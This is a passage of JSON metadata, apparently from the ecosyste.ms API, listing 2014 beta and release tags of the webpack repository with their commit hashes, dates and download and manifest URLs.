ste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","